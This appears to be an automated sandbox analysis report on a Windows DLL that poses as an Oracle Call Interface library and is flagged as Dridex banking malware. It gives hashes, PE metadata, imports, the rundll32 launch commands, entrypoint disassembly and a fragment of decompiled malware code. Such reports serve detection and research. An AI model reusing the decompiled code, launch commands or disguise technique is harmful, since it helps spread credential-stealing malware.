                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.0000448208544093
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:sqifB0oXkHVzOMjed+x8/u7sOS274It7c:sqifvXsVzOMje3/u7sOX4It7c
                                                                                                      MD5:717352CD42907A1560CC3A9878394AF7
                                                                                                      SHA1:8219062D9152D35481EACA6E77AB659CCC92C01D
                                                                                                      SHA-256:3B77FF498A4AD8C84A4FCC826A420B93C27EB86B2FA2867D3F78A5502B96EFFC
                                                                                                      SHA-512:DDA2C9E5ED4D60F91CC0636184F3EEDD2F9ACE92C9C3A8C2BCEBB1C7386C0EB0DFE9E8CB966542A3E11A65152F6D18C7A8B7D2DBCF6356F4BBDC89293D22C047
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: Version=1 EventType=BEX EventTime=132850096241251713 ReportType=2 Consent=1 ReportIdentifier=7effaa1e-6b7a-4b2b-9d1f-da5f2072704f IntegratorReportIdentifier=75a65cb8-43a4-42fa-9c06-425a037e41f5 Wow64Host=34404 Wow64Guest=332 NsAppName=rundll32.exe OriginalFilename=RUNDLL32.EXE AppSessionGuid=00001960-0001-001b-f3d6-ce5175fad701 TargetAppId=W:0000f519feec486de87ed73cb92d3cac802400000000!0000bcc5dc3222034d3f257f1fd35889e5be90f09b5f!rundll32.exe TargetAppVer=1986//01//30:11:42:44!103d
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER427.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4731
                                                                                                      Entropy (8bit):4.4479686247920664
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zs5JgtWI9+i7WSC8BF8fm8M4JCdsA97Fej+q8vjsA9B4SrSOd:uITfLZiKSNYJyKKzzDWOd
                                                                                                      MD5:EEABF8D07101FD6411D2E76E3A546286
                                                                                                      SHA1:1D85E981286F68BBFBFEC81169E4766F082EE88F
                                                                                                      SHA-256:1A41F6023E303ED99DBA0945C98141C450E61F4D47C962479000937E7B5FE2B1
                                                                                                      SHA-512:4B090B15289481F7EFA4FBBA52A0A60B5CCF689EB8DCF1F9E8D0D28937BFBB4919431975D5558EAEE5E0ED329B27A333DFA34AA915BA0DF99165A5F3806E961E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="17134" /> <arg nm="vercsdbld" val="1" /> <arg nm="verqfe" val="1" /> <arg nm="csdbld" val="1" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="1033" /> <arg nm="geoid" val="244" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="1314817" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.1.17134.0-11.0.47" /> <arg nm="portos" val="0" /> <arg nm="ram" val="4096" />
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERE64C.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 14 streams, Sun Dec 26 16:27:01 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):46978
                                                                                                      Entropy (8bit):2.1386478701324085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:WmsgUOTajHiAM6SM4eO5Skb44ynjngyfxTlT/qw86om6nxTLzdeXYeq:bPabcBb5Lb44ynjgujqxTLz0I3
                                                                                                      MD5:206968ED73ECB16B39091E3625D9E8B0
                                                                                                      SHA1:2A98F0A379AAE0F97913FC801ECF159E09255E4E
                                                                                                      SHA-256:CFE4A48F936677001FD583B3956081ABCB47071C47667F57C36FDB7721078FBA
                                                                                                      SHA-512:5DF3181BBE7CB38549AA965B8AA69EFD5984DB683C18834104A42009AA840947900261077FDEF7B92CB460F840891E129A6E74E43AD2636DDB6FB3350E151A1B
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WEREE1D.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8272
                                                                                                      Entropy (8bit):3.6954724365915483
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiTa6ft16YnY66VgmfTwDSD+prV89bIZoSmsf7uZm:RrlsNiO6ft16YY66VgmfTUS1IZoSFf6U
                                                                                                      MD5:7DF9F40560D821B578853C8AC59820CF
                                                                                                      SHA1:AC4C351449BD25EA0C96154B639608C4DBDFC9E3
                                                                                                      SHA-256:72B22A8BBF5A8C54889D0C69E38A657A6E80ADD044B13984DF2FA06AE0E08D50
                                                                                                      SHA-512:1CEC619AA943A0811847BDE98A7E002BBF862C21C2D843B4A4F3F6E272F62BB08F404E17B5F3F2493D032B9D5932255612A558D75FDB60C51992872BD9686BCA
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6484</Pid>
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF36D.tmp.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4630
                                                                                                      Entropy (8bit):4.462773353078608
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:cvIwSD8zs5JgtWI9+i7WSC8By8fm8M4JCdsA9DFoVk+q8/F5n/4SrSLd:uITfLZiKSN9JyVCVDWLd
                                                                                                      MD5:2B32C46F97FB98D0B8ED6299C04C3C60
                                                                                                      SHA1:ED6759009A19FA06FFB87EDBA2368A5C6A6018F9
                                                                                                      SHA-256:1A867D30844F3A066C98E1937B7F9BEA48BA66FCDD7D8413603B536A059E9431
                                                                                                      SHA-512:93B87F21C32F2BF80ED38233F9D46A62FDF3190A7F1E71E9D41CE010DBE97D23E9EFE0AC65DF1ED03FD9ED39B77526A4936ECADEE4EAAA70B063C6155F35E13E
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <req ver="2"> <tlm> <src> <desc> <mach> <os> <arg nm="vermaj" val="10" /> <arg nm="vermin" val="0" /> <arg nm="verbld" val="17134" /> <arg nm="vercsdbld" val="1" /> <arg nm="verqfe" val="1" /> <arg nm="csdbld" val="1" /> <arg nm="versp" val="0" /> <arg nm="arch" val="9" /> <arg nm="lcid" val="1033" /> <arg nm="geoid" val="244" /> <arg nm="sku" val="48" /> <arg nm="domain" val="0" /> <arg nm="prodsuite" val="256" /> <arg nm="ntprodtype" val="1" /> <arg nm="platid" val="2" /> <arg nm="tmsi" val="1314817" /> <arg nm="osinsty" val="1" /> <arg nm="iever" val="11.1.17134.0-11.0.47" /> <arg nm="portos" val="0" /> <arg nm="ram" val="4096" />
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF6D6.tmp.dmp
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:Mini DuMP crash report, 15 streams, Sun Dec 26 16:27:06 2021, 0x1205a4 type
                                                                                                      Category:dropped
                                                                                                      Size (bytes):48114
                                                                                                      Entropy (8bit):2.214478850648368
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:spSTPOAweBQ1yPO5Skb0n5F8OAJBMhY7Cic64tYqRd:5R7Wp5LbauJJ7oOqf
                                                                                                      MD5:CDA1D8C55F50A313FF3D2A7329EBCAE7
                                                                                                      SHA1:96F7234CF1C8F68C220804F09D1C3AB22382D81C
                                                                                                      SHA-256:9CC5AF8951F9F570166671864ABC67DE2093209CC54F3495DB89B9CF96745D06
                                                                                                      SHA-512:BD069989775B4E5CCF8727CAA79E413D20F3E216E5888F247981A90785D42FF1D9C4A072A60324871F09DC0DB4600BC0F5C30CEC714BDCB7135A872A27442213
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9.tmp.WERInternalMetadata.xml
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):8352
                                                                                                      Entropy (8bit):3.6888277131607947
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:Rrl7r3GLNiwo6L6YnY6Dgmf8ZSY+pB789bI9ssf/ulm:RrlsNiX6L6YY6Dgmf8ZSKI9/f2o
                                                                                                      MD5:C67D9D1CFEB29DE16FC73541620A6BCC
                                                                                                      SHA1:2FA1A6B3F4D4FC257A7BC337F10061B33109CEAA
                                                                                                      SHA-256:C3D56890FC63DA7B18860D0C3C9B9761FD843466BB42707F6C7B418EA11FEEBF
                                                                                                      SHA-512:D9FEA34D57691311F930763F5BFAABCCE36CE3705337A9783152197E3E002F14DB5292B832B316D9D2D12FB6FA5CE99195AA3A85B06BD43AD8C47A9818561675
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>17134</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString> <Revision>1</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>1033</LCID> </OSVersionInformation> <ProcessInformation> <Pid>6496</Pid>
                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1572864
                                                                                                      Entropy (8bit):4.240225930170385
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12288:vq9elvRGZTfXh9g7lg9YTkV8gUnsMhEhczXfTDaT6toEwdfj:S9elvRGZTfR9g7vhg
                                                                                                      MD5:B33794E3C6B1BEB6D6B2581831709E4D
                                                                                                      SHA1:BC9BB5B86AE5D7EC84E8F45ED0B93F5C03A27AE3
                                                                                                      SHA-256:2AC4F58765C291C6D51B5C2CA28421A9996607457DD0D05F8BF5275FC7F28759
                                                                                                      SHA-512:55DD41010C8783E6CE731A7FD38AB9A3897756A759264C7157E61F65DEC3E22B5ADE92CCE1564447005E2FB65E744C4F4B1B0867B8874A00C009F09EFEF43CA3
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):3.407583074430547
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:OH5GY5K5PPv4EgnVVeeDzeQ1NKZtjoT8GpwL1033SYH:ipKjg/eeDzeuNYtjpGpwLkSY
                                                                                                      MD5:3A7B0EC19DB89A30EB62BF9891DF07F8
                                                                                                      SHA1:95EA4D60CA49F5DB36207E645B5EB1B936190159
                                                                                                      SHA-256:1771EAB3A5D72F77997C3029E5900693DFDC0057DB2038548A9702B74864B397
                                                                                                      SHA-512:D355B50B97CBF4C65894924B0A115B91A5487AB96685FFB3F23349EC9E3F6214A24CFDC58DFDBBECADC5489A0E8C196FF039183A75052AB46C4639CB7CCBA60C
                                                                                                      Malicious:false

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                      Entropy (8bit):7.269426930570889
                                                                                                      TrID:
                                                                                                      • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                      • DOS Executable Generic (2002/1) 0.20%
                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                      File name:G7ABVJxc3Z.dll
                                                                                                      File size:536576
                                                                                                      MD5:47c59530065e8e7e05a855879bf8a922
                                                                                                      SHA1:8fba3ea2428f92e8dc8497514d0817b54edc5be0
                                                                                                      SHA256:e4db910a4147ac44bef76f71e6b0d6bd193b89a6268dda35f3b1c210cc111fe4
                                                                                                      SHA512:c99e35f6313aa75f24b7bdb1cc9e91eb7246dd7cd79de9c18f50d1f6ee27984ff075c108d1025e16dbd6d03087d11bcb6f927c5773e8a03d7bdd02c204782a42
                                                                                                      SSDEEP:6144:4KMImhktm7mnmvetmzK/kxwv4Zm7mREqZzdazdULd54f3X0kdVtL8faGAPlX:49hXAg5aX0CL8fI

                                                                                                      File Icon

                                                                                                      Icon Hash:74f0e4ecccdce0e4

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x10005a10
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x10000000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                      Time Stamp:0x61B705D1 [Mon Dec 13 08:35:29 2021 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:5
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:5
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:5
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:e9192d34e4c9dcdf739aaa1d74025eb2

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      mov edx, 00000003h
                                                                                                      cmpps xmm1, xmm0, 02h
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      add eax, 0Ch
                                                                                                      cmp edx, 03h
                                                                                                      je 00007F8410AF0892h
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      int3
                                                                                                      push ebp
                                                                                                      mov ebp, esp
                                                                                                      push edi
                                                                                                      push ebx
                                                                                                      push esi
                                                                                                      and esp, FFFFFFF8h
                                                                                                      sub esp, 000000A0h
                                                                                                      mov eax, dword ptr [ebp+08h]
                                                                                                      mov ecx, 006B34C2h
                                                                                                      mov edx, dword ptr [esp+7Ch]
                                                                                                      mov dword ptr [esp+7Ch], 3CDA3086h
                                                                                                      mov dword ptr [esp+00000094h], 00000000h
                                                                                                      mov dword ptr [esp+00000090h], 006C4587h
                                                                                                      mov byte ptr [esp+7Ah], FFFFFFBDh
                                                                                                      mov dword ptr [esp+74h], 629729F9h
                                                                                                      mov byte ptr [esp+65h], FFFFFFF1h
                                                                                                      mov dword ptr [esp+38h], 694CC273h
                                                                                                      mov esi, dword ptr [esp+00000094h]
                                                                                                      mov edi, dword ptr [esp+00000090h]
                                                                                                      mov ebx, edi
                                                                                                      add ebx, 171E5389h
                                                                                                      mov dword ptr [esp+30h], eax
                                                                                                      mov eax, esi
                                                                                                      adc eax, 00000000h
                                                                                                      mov dword ptr [esp+48h], ebx
                                                                                                      mov dword ptr [esp+4Ch], eax
                                                                                                      mov dword ptr [esp+2Ch], edi
                                                                                                      mov dword ptr [esp+28h], ecx
                                                                                                      mov dword ptr [esp+24h], edx
                                                                                                      mov dword ptr [esp+20h], esi
                                                                                                      call 00007F8410AF4296h
                                                                                                      mov ecx, 4C276534h
                                                                                                      mov edx, dword ptr [esp+2Ch]

                                                                                                      Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x780d0 | 0x64 | .rdata |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x781b0 | 0x17c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x82000 | 0x2f0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x83000 | 0x1214 | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x90f0 | 0x38 | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0xe8 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                                      Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x74d8 | 0x8000 | False | 0.360290527344 | data | 4.61113521989 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rdata | 0x9000 | 0x6fff8 | 0x70000 | False | 0.311179024833 | data | 7.3778786518 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x79000 | 0x80f4 | 0x7000 | False | 0.295828683036 | data | 6.02916609898 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
| .rsrc | 0x82000 | 0xec8 | 0x1000 | False | 0.090087890625 | data | 0.784979301457 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x83000 | 0x1214 | 0x2000 | False | 0.287475585938 | data | 4.27724948186 | IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                                                                                                      Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_VERSION | 0x82060 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |

                                                                                                      Imports

| DLL | Import |
|---|---|
| KERNEL32.dll | CreateFileW, GetProcessVersion, GetModuleFileNameW, CloseHandle, VirtualAllocEx, DeleteTimerQueue, InitAtomTable |
| msvcrt.dll | wcscoll |
| SETUPAPI.dll | SetupDiOpenDeviceInterfaceW |
| WININET.dll | InternetReadFile |
| RPCRT4.dll | RpcMgmtSetCancelTimeout, NdrGetUserMarshalInfo |
| LZ32.dll | LZCopy |
| USER32.dll | BlockInput, TranslateMessage, FillRect, GetWindowTextA, DefMDIChildProcW, GetWindowContextHelpId, IsWinEventHookInstalled, GetClassNameA |
| NTDSAPI.dll | DsGetDomainControllerInfoW |
| IPHLPAPI.DLL | GetIpAddrTable |
| WS2_32.dll | WSACleanup, inet_addr |
| IMM32.dll | ImmGetCandidateListW |
| ADVAPI32.dll | CreateRestrictedToken, CryptGenKey, CryptAcquireContextW, RegCloseKey, CryptContextAddRef |
| GDI32.dll | GetViewportOrgEx, SetWindowOrgEx |
| pdh.dll | PdhAddCounterW |
| ole32.dll | CoCreateInstanceEx, CoGetObjectContext, StringFromGUID2 |
| WINMM.dll | waveOutGetPitch |
| SHLWAPI.dll | AssocGetPerceivedType |
| ESENT.dll | JetInit |

                                                                                                      Exports

| Name | Ordinal | Address |
|---|---|---|
| Wgpomsdeeomtunmdrt | 1 | 0x10078125 |

                                                                                                      Version Infos

| Description | Data |
|---|---|
| OriginalFilename | Hen.dll |
| FileDescription | Oracle Call Interface |
| FileVersion | 7.0.2.1.0 |
| Legal Copyright | Copyright Oracle Corporation 1979, 2001. All rights reserved. |
| CompanyName | Oracle Corporation |
| Translation | 0x0409 0x04b0 |

                                                                                                      Possible Origin

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

                                                                                                      Network Behavior

                                                                                                      No network behavior found

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Start time:17:26:21
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll"
                                                                                                      Imagebase:0xc30000
                                                                                                      File size:116736 bytes
                                                                                                      MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate

                                                                                                      General

                                                                                                      Start time:17:26:21
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:17:26:22
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\G7ABVJxc3Z.dll,Wgpomsdeeomtunmdrt
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.740603075.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.742949248.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:17:26:22
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\G7ABVJxc3Z.dll",#1
                                                                                                      Imagebase:0xa50000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000002.831692261.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.733407707.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.734461323.000000006E471000.00000020.00020000.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:17:26:57
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6484 -s 740
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      General

                                                                                                      Start time:17:27:01
                                                                                                      Start date:26/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6496 -s 864
                                                                                                      Imagebase:0x2b0000
                                                                                                      File size:434592 bytes
                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Disassembly

                                                                                                      Code Analysis

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 83%
                                                                                                        			E6E480730(void* __ecx) {
                                                                                                        				void* __esi;
                                                                                                        				intOrPtr _t155;
                                                                                                        				signed char* _t159;
                                                                                                        				char _t162;
                                                                                                        				void* _t180;
                                                                                                        				intOrPtr _t189;
                                                                                                        				char _t190;
                                                                                                        				intOrPtr _t196;
                                                                                                        				intOrPtr _t200;
                                                                                                        				void* _t203;
                                                                                                        				void* _t212;
                                                                                                        				void* _t213;
                                                                                                        				void* _t215;
                                                                                                        				void* _t216;
                                                                                                        				void* _t223;
                                                                                                        				void* _t238;
                                                                                                        				void* _t241;
                                                                                                        				void* _t244;
                                                                                                        				void* _t247;
                                                                                                        				void* _t250;
                                                                                                        				void* _t254;
                                                                                                        				void* _t259;
                                                                                                        				void* _t265;
                                                                                                        				void* _t268;
                                                                                                        				int _t271;
                                                                                                        				void* _t272;
                                                                                                        				void* _t276;
                                                                                                        				void* _t277;
                                                                                                        				void* _t278;
                                                                                                        				void* _t282;
                                                                                                        				int _t288;
                                                                                                        				intOrPtr* _t291;
                                                                                                        				signed char _t294;
                                                                                                        				signed char _t295;
                                                                                                        				intOrPtr* _t320;
                                                                                                        				intOrPtr* _t325;
                                                                                                        				intOrPtr* _t363;
                                                                                                        				char _t364;
                                                                                                        				intOrPtr* _t372;
                                                                                                        				void* _t377;
                                                                                                        				void* _t382;
                                                                                                        				void* _t383;
                                                                                                        				void* _t384;
                                                                                                        				void* _t385;
                                                                                                        				void* _t386;
                                                                                                        				void* _t387;
                                                                                                        				void* _t393;
                                                                                                        				void* _t395;
                                                                                                        				void* _t401;
                                                                                                        				void* _t403;
                                                                                                        				intOrPtr* _t404;
                                                                                                        				signed int _t406;
                                                                                                        				intOrPtr* _t409;
                                                                                                        				void* _t411;
                                                                                                        				signed int _t413;
                                                                                                        				void* _t414;
                                                                                                        				void* _t415;
                                                                                                        				void* _t420;
                                                                                                        				intOrPtr* _t423;
                                                                                                        				void* _t425;
                                                                                                        				void** _t427;
                                                                                                        				void* _t428;
                                                                                                        				void* _t429;
                                                                                                        
                                                                                                        				_t414 = __ecx;
                                                                                                        				_t155 =  *0x6e48d1f8;
                                                                                                        				if(_t155 == 0x4c71e88d) {
                                                                                                        					_t155 = E6E48361C(0x30);
                                                                                                        					 *0x6e48d1f8 = _t155;
                                                                                                        				}
                                                                                                        				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
                                                                                                        					_t415 = _t428 + 0x48;
                                                                                                        					E6E483698(_t415, 0, 0x11c);
                                                                                                        					_t429 = _t428 + 0xc;
                                                                                                        					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
                                                                                                        					if(E6E48306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
                                                                                                        						_push(_t415);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					_t404 =  *0x6e48d1f8;
                                                                                                        					_t159 = _t429 + 0x4c;
                                                                                                        					_t294 =  *_t159;
                                                                                                        					 *(_t404 + 8) = _t294;
                                                                                                        					_t295 = _t159[4];
                                                                                                        					 *(_t404 + 9) = _t295;
                                                                                                        					 *((char*)(_t404 + 0xa)) = _t159[0x110];
                                                                                                        					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
